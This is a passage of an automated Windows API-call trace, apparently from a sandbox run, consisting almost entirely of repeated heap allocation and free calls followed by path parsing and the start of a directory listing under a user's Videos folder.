hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0240.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\") returned="arnu9pMGj4v\\" [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0240.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\") returned="NRaXHt\\" [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a3b8 | out: hHeap=0x620000) returned 1 [0240.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0240.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f850 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0240.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f850 | out: hHeap=0x620000) returned 1 [0240.789] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.790] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.790] PathFindFileNameW (pszPath="") returned="" [0240.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0240.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcecda710, ftCreationTime.dwHighDateTime=0x1d5c23f, ftLastAccessTime.dwLowDateTime=0x4cc1e0f0, ftLastAccessTime.dwHighDateTime=0x1d5b624, ftLastWriteTime.dwLowDateTime=0x4cc1e0f0, ftLastWriteTime.dwHighDateTime=0x1d5b624, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0240.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcecda710, 